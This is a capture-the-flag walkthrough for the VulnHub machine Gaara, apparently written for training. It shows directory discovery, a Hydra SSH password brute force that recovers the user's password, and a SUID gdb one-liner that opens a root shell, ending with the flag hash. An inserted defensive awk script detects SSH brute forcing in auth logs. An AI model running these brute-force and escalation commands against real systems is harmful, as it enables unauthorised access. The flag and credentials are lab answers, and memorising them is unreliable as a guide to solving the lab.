https://www.vulnhub.com/entry/gaara-1,629/
Scanning port 80 turns up /Cryoserver.

    ┌──(kali㉿mykali)-[~/Documents/gaara]
    └─$ curl http://192.168.56.78/Cryoserver | sed '/^$/d'
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100   327  100   327    0     0   159k      0 --:--:-- --:--:-- --:--:--  319k
    /Temari
    /Kazekage
    /iamGaara

Guess that gaara is the SSH username.

    ┌──(kali㉿mykali)-[~/Documents/gaara]
    └─$ hydra -l gaara -P /usr/share/wordlists/rock_ascii.txt 192.168.56.78 ssh -f
    Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-15 14:56:17
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 14329293 login tries (l:1/p:14329293), ~895581 tries per task
    [DATA] attacking ssh://192.168.56.78:22/
    [STATUS] 164.00 tries/min, 164 tries in 00:01h, 14329131 to do in 1456:13h, 16 active
    [22][ssh] host: 192.168.56.78 login: gaara password: iloveyou2
    [STATUS] attack finished for 192.168.56.78 (valid pair found)
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-15 14:58:09

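From the defender's side, the run above (16 parallel tasks, about 164 tries per minute, then a valid login) leaves a clear trail in the sshd auth log. The following is an added example, not part of the original write-up: it counts failed passwords per source IP and reports when a success follows them. The source IPs, PIDs, ports and the threshold of 10 are constructed or assumed values.

```shell
#!/bin/sh
# Added example (not from the write-up): flag SSH password guessing.
# Reads sshd auth-log text on stdin and prints, per offending source IP:
#   <ip> failed=<n> users=<distinct names tried> compromised=<user or ->
detect_ssh_bruteforce() {
    threshold="${1:-10}"   # assumed tuning value: failures per source IP
    awk -v threshold="$threshold" '
        # Both message types end in: for NAME from IP port N ssh2
        function parse() {
            if ($(NF-4) != "from" || $(NF-2) != "port") return 0
            ip = $(NF-3); user = $(NF-5)
            return 1
        }
        / sshd\[[0-9]+\]: Failed password for / {
            if (!parse()) next
            failed[ip]++
            if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
            next
        }
        # A success from an IP already over the threshold: a guess worked.
        / sshd\[[0-9]+\]: Accepted password for / {
            if (parse() && (ip in failed) && failed[ip] >= threshold && !(ip in hit))
                hit[ip] = user
        }
        END {
            for (ip in failed)
                if (failed[ip] >= threshold)
                    printf "%s failed=%d users=%d compromised=%s\n",
                        ip, failed[ip], users[ip], (ip in hit) ? hit[ip] : "-"
        }
    ' | sort
}

# Constructed sample: 12 rapid failures then a success from one host,
# plus one mistyped password from another host (must not be flagged).
sample_log() {
    i=0
    while [ "$i" -lt 12 ]; do
        printf 'Mar 15 14:57:%02d Gaara sshd[%d]: Failed password for gaara from 192.168.56.10 port %d ssh2\n' \
            "$i" $((900 + i)) $((40000 + i))
        i=$((i + 1))
    done
    echo 'Mar 15 14:58:05 Gaara sshd[950]: Accepted password for gaara from 192.168.56.10 port 40100 ssh2'
    echo 'Mar 15 15:10:00 Gaara sshd[960]: Failed password for gaara from 192.168.56.20 port 51000 ssh2'
    echo 'Mar 15 15:10:09 Gaara sshd[961]: Accepted password for gaara from 192.168.56.20 port 51002 ssh2'
}

sample_log | detect_ssh_bruteforce 10
```

A `compromised=` value other than `-` means the account's password was guessed and should be rotated; the same log signal is what rate limiting or key-only authentication would have cut off.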
SSH in, find that gdb is a SUID file, and use it to get root.

    gaara@Gaara:~$ gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
    GNU gdb (Debian 8.2.1-2+b3) 8.2.1
    Copyright (C) 2018 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.
    Type "show copying" and "show warranty" for details.
    This GDB was configured as "x86_64-linux-gnu".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see:
    <http://www.gnu.org/software/gdb/bugs/>.
    Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.
    For help, type "help".
    Type "apropos word" to search for commands related to "word".
    # id
    uid=1001(gaara) gid=1001(gaara) euid=0(root) egid=0(root) groups=0(root),1001(gaara)
    # cd /root
    # ls
    root.txt
    # id;hostname;cat root.txt
    uid=1001(gaara) gid=1001(gaara) euid=0(root) egid=0(root) groups=0(root),1001(gaara)
    Gaara
     ██████╗  █████╗  █████╗ ██████╗  █████╗
    ██╔════╝ ██╔══██╗██╔══██╗██╔══██╗██╔══██╗
    ██║  ███╗███████║███████║██████╔╝███████║
    ██║   ██║██╔══██║██╔══██║██╔══██╗██╔══██║
    ╚██████╔╝██║  ██║██║  ██║██║  ██║██║  ██║
     ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝
    8a763d61f71db8e7aa237055de928d86
    Congrats You have Rooted Gaara.
    Give the feedback on Twitter if you Root this : @0xJin
    #
